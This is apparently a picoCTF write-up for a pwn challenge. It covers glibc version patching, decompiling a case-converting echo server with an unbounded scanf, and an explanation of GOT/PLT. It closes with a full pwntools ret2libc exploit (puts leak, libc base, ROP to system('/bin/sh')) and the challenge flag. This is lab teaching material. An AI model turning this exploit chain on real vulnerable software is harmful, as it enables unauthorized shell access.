They gave us a 64
bit ELF
.
file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e5dba3e6ed29e457cd104accb279e127285eecd0, not stripped
Here’s the checksec result.
checksec vuln
[*] "/picoctf/Here's_a_libc/vuln"
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./'
Stripped: No
I tried executing the file but it didn’t run.
./vuln
Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion `sym != NULL' failed!
That’s a problem.
What exactly is a libc
?
libc is the C standard library.
The functions we use a lot in C, such as printf
, scanf
, read
… are all defined there.
There are a couple implementations of libc
(glibc,musl…).
On linux though, when people say libc
there usually referring to glibc
.
As you can see, there’s a g
prefix in glibc
similar to GCC
.
The g
stands for 'GNU's Not Unix'
.
Long story short GCC
is used to make the executable(ELF
) and glibc
is the runtime environment the ELF
relies on to work.
There are many versions of libc
new versions get released twice a year.
We were also given a libc.so.6
.
What is libc.so.6
?
libc.so.6
is a symbolic link that refers to the glibc
shared library on Linux
.
Let’s check which version of libc
it uses.
It’s glibc 2.27
.
strings libc.so.6 | grep "GNU"
GNU C Library (Ubuntu glibc 2.27-3ubuntu1.2) stable release version 2.27.
Compiled by GNU CC version 7.5.0.
Now that we know which version of libc
picoCTF uses, we need to which we’re using.
Run ldd
on your *nix machine. It’ll tell you which version of glibc
you’re using.
ldd --version
ldd (Ubuntu glibc 2.39-0ubuntu8.5) 2.39
Copyright (C) 2024 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
I’m using 2.39
.
We probably couldn’t run the ELF
file due to the mismatch of glibc
versions.
The glibc
my computer uses was much higher. 2.39
vs 2.27
.
Let’s check which OS the vuln
file was built on.
You can use strings
and grep
to find which version of linux the ELF
was made from.
strings vuln | grep "GCC:"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
It looks like it’s Ubuntu 18.04
.
Why did I check where the ELF
file was built?
Well, if I know the Ubuntu version, I’ll probably know the libc
version as well.
Ubuntu 18.04
uses glibc 2.27
.
The simplest way to solve the glibc version issue is to get a hold of Ubuntu 18.04, because it uses glibc 2.27.
People usually use Docker to get holds on different versions of Ubuntu.
If it’s your first time solving this problem, and don’t know what glibc is I don’t recommend using Dockerfiles.
You’ll be loaded with too much information on Docker
and Dockerfiles
.
You also have to learn Docker and Dockerfiles separately, which takes some time.
However, next time when you’re solving pwn challenges that requires you to use different glibc version, use Dockerfiles.
It’s more convenient than the way I’m introducing.
I’ll be using pwninit for this writeup.
pwninit
is written in Rust
so you’ll have to install Rust
first.
You also might have to pass the --locked
flag when installing pwninit
.
Otherwise it might not get installed.
Add the cargo bin to your PATH
.
export PATH=$PATH:/home/your_name/.cargo/bin
You need to install patchelf.
sudo apt-get install patchelf
Then run pwninit
in the directory where the vuln
executable lives.
pwninit
bin: ./vuln
libc: ./libc.so.6
ld: ./ld-2.27.so
unstripping libc
https://launchpad.net/ubuntu/+archive/primary/+files//libc6-dbg_2.27-3ubuntu1.2_amd64.deb
warning: failed unstripping libc: failed running eu-unstrip, please install elfutils: No such file or directory (os error 2)
copying ./vuln to ./vuln_patched
running patchelf on ./vuln_patched
writing solve.py stub
Let’s run vuln_patched
.
Now you can see that it works properly.
./vuln_patched
WeLcOmE To mY EcHo sErVeR!
hwkim301
HwKiM301
^C
Let’s check the file in IDA or Ghidra.
Here’s the main function.
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
void *v3; // rsp
char v4; // al
char *v5; // rdi
const char **v6; // [rsp+0h] [rbp-80h] BYREF
int v7; // [rsp+Ch] [rbp-74h]
char v8[40]; // [rsp+10h] [rbp-70h] BYREF
char *s; // [rsp+38h] [rbp-48h]
__int64 v10; // [rsp+40h] [rbp-40h]
unsigned __int64 v11; // [rsp+48h] [rbp-38h]
__gid_t rgid; // [rsp+54h] [rbp-2Ch]
unsigned __int64 i; // [rsp+58h] [rbp-28h]
v7 = argc;
v6 = argv;
setbuf(_bss_start, 0);
rgid = getegid();
setresgid(rgid, rgid, rgid);
v11 = 27;
strcpy(v8, "Welcome to my echo server!");
v10 = 26;
v3 = alloca(32);
s = (char *)&v6;
for ( i = 0; i < v11; ++i )
{
v4 = convert_case(v8[i], i);
s[i] = v4;
}
v5 = s;
puts(s);
while ( 1 )
do_stuff(v5);
}
The convert_case
function.
__int64 __fastcall convert_case(char a1, char a2)
{
if ( a1 <= '`' || a1 > 122 )
{
if ( a1 <= 64 || a1 > 90 )
{
return (unsigned __int8)a1;
}
else if ( (a2 & 1) != 0 )
{
return (unsigned int)(unsigned __int8)a1 + 32;
}
else
{
return (unsigned __int8)a1;
}
}
else if ( (a2 & 1) != 0 )
{
return (unsigned __int8)a1;
}
else
{
return (unsigned int)(unsigned __int8)a1 - 32;
}
}
The program takes strings as input and converts cases in the odd indices of the string.
For example, only 'h'
, 'k'
, 'm'
were converted in 'hwkim301'
.
The do_stuff
function.
int do_stuff()
{
char v0; // al
char v2; // [rsp+Fh] [rbp-81h] BYREF
char s[112]; // [rsp+10h] [rbp-80h] BYREF
__int64 v4; // [rsp+80h] [rbp-10h]
unsigned __int64 i; // [rsp+88h] [rbp-8h]
v4 = 0;
__isoc99_scanf("%[^\n]", s);
__isoc99_scanf("%c", &v2);
for ( i = 0; i <= 0x63; ++i )
{
v0 = convert_case(s[i], i);
s[i] = v0;
}
return puts(s);
}
The scanf
function acts as if it’s a gets
function because there isn’t a limit in the format string.
A BOF can be used to exploit the scanf
function.
The current code works as if it’s a gets
function, taking input until a newline is received.
__isoc99_scanf("%[^\n]", s);
It should be fixed like this.
scanf("%112[^\n]", s);
Knowing that the input buffer is 112
bytes, which is a multiple of 16
I know that the return address will be at rbp+8
.
char s[112]; // [rsp+10h] [rbp-80h] BYREF
Therefore the offset between the input buffer to the return address is rbp+8
- rbp-0x80 = 0x88
bytes.
Now we are able to overwrite the return address.
The problem is that there aren’t any execve
or system
function in the binary itself so it’s going to be hard to pop a shell.
We need to to three things in order to get a shell.
First, we need to find the libc base address.
Then, we need to return to the main function, where we can use that leaked address(libc base) for a BOF.
Finally we need to use system('/bin/sh')
to pop a shell.
The libc base address is literally the memory address where libc gets mapped to the memory.
Even though, the program doesn’t contain execve
or a system
function if we know the libc base address and the offset to a certain system
function, it’ll let you call system('/bin/sh')
since libc
has a whole bunch of functions defined.
To do that we’ll have to use the GOT
and PLT
.
They’re both used only in dynamic linked ELF
files.
GOT (Global Offset Table)
The GOT is a table in the binary that stores the actual addresses of functions in shared libraries (like libc) at runtime.
When a function like puts
is called, the program looks up its real address in the GOT.
PLT (Procedure Linkage Table)
The PLT is a set of stubs (small pieces of code) in the binary that jump to the addresses in the GOT.
When you call puts@plt
, it uses the GOT to find where puts is in libc and jumps there.
You can use the PLT to call functions (like puts@plt) even if you don’t know their real address.
You can leak addresses from the GOT (like puts@got) to find the libc base address.
Once you have the libc base, you can calculate the address of any function in libc (like system or execve) and use it in your exploit.
Although the libc base changes everytime the offsets to the functions don’t.
Dynamic linking allows programs to use shared libraries (like libc) without knowing their exact memory addresses at compile time.
When a program calls a library function (like puts), it doesn’t know where that function will be in memory after the program is loaded.
When you call a function like puts, the call goes to puts@plt.
If it’s the first time calling the function, the PLT code asks the dynamic linker to find the real address of puts and stores it in the GOT.
After the first call, the PLT uses the address stored in the GOT to call the function directly (no more lookup needed).
1. Overwrite the return address
2. set rdi
to puts@got
.
This is where the address for puts
is.
rdi
now saves the address puts@got
.
3. Use puts@plt
Since rdi
is set up to puts@got
by using puts() will be called with puts@GOT
as the argument.
Therefore we will get puts@GOT
which is the actual memory address.
I used puts
because unlike other functions, setbuf
or read
in actually prints output to the screen, making it easier to capture the leaked address.
4. Then we get back to main.
We need to go back to the main function, because that’s where the only vulnerable code is and to exploit it we need to use it again.
5. Find the memory address that was leaked in libc.
Set a breakpoint in gdb and run vmmap
.
You’ll see that the libc address all start with 0x7f
…
0x00007ffff79e4000 0x00007ffff7bcb000 0x0000000000000000 r-x /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7bcb000 0x00007ffff7dcb000 0x00000000001e7000 --- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dcb000 0x00007ffff7dcf000 0x00000000001e7000 r-- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dcf000 0x00007ffff7dd1000 0x00000000001eb000 rw- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dd1000 0x00007ffff7dd5000 0x0000000000000000 rw-
Here are the last couple of bytes after sending the payload.
b'\nAa...Ad\n0Z\x96\xfbG\x7f'
When puts prints a 64-bit address, it often doesn’t print a full 8
bytes if the leading bytes are null (\x00
).
For example, an address like 0x00007fabcdef1234
would typically be printed as \x7f\xab\xcd\xef\x12\x34
by puts because puts stops printing at the first null byte it encounters.
By taking the last 6
bytes, you’re trying to capture the significant, non-null bytes of the leaked 64-bit address, assuming the first two bytes were 0x0000
. This is a common heuristic.
Since u64
works for 64 bit integers we need to make it to 8
bytes using ljust filling it up with null bytes should be enough.
leak=u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
6. Find the libc base
Now that we know the memory address of puts we can calculate the libc base by subtracting it’s offset.
libc.address=leak-libc.symbols['puts']
7. call /bin/sh
using the system function in libc.
Overwrite the return address set rdi to '/bin/sh'
using the pop rdi, ret instruction.
Call the system function using libc.
ELF.search is used to
search strings in an ELF
or libc
file.
Since it returns a generator, we can use next to grab the values it returns.
What’s a generator?
A generator in Python is a special type of iterator that allows you to create an iterable sequence of values on the fly, without storing the entire sequence in memory at once.
The stack needs to be 16 bit aligned. I explained why it has to be aligned in the guessing_game writeup.
To make it 16 bit aligned I passed a ret
instruction.
payload2=b'A'*136
payload2+=p64(pop_rdi)
payload2+=p64(next(libc.search(b'/bin/sh')))
payload2+=p64(vuln_rop.find_gadget(['ret']).address)
payload2+=p64(libc.symbols['system'])
Here’s the complete code.
Exploit
from pwn import *
r = remote("mercury.picoctf.net", 1774)
e = ELF("./vuln")
libc = ELF("./libc.so.6")
vuln_rop = ROP(e)
pop_rdi = vuln_rop.find_gadget(["pop rdi", "ret"]).address
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
main = e.symbols["main"]
payload = b"A" * 136
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendlineafter(b"WeLcOmE To mY EcHo sErVeR!", payload)
leak = u64(r.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
log.info(f"{hex(leak)}")
libc.address = leak - libc.symbols["puts"]
log.info(f"libc base: {hex(libc.address)}")
payload2 = b"A" * 136
payload2 += p64(pop_rdi)
payload2 += p64(next(libc.search(b"/bin/sh")))
payload2 += p64(vuln_rop.find_gadget(["ret"]).address)
payload2 += p64(libc.symbols["system"])
r.sendline(payload2)
r.interactive()
The flag is picoCTF{1_<3_sm4sh_st4cking_f2ac531bbb3a68ed}
.
My favorite write up is this one. It’s pretty detailed.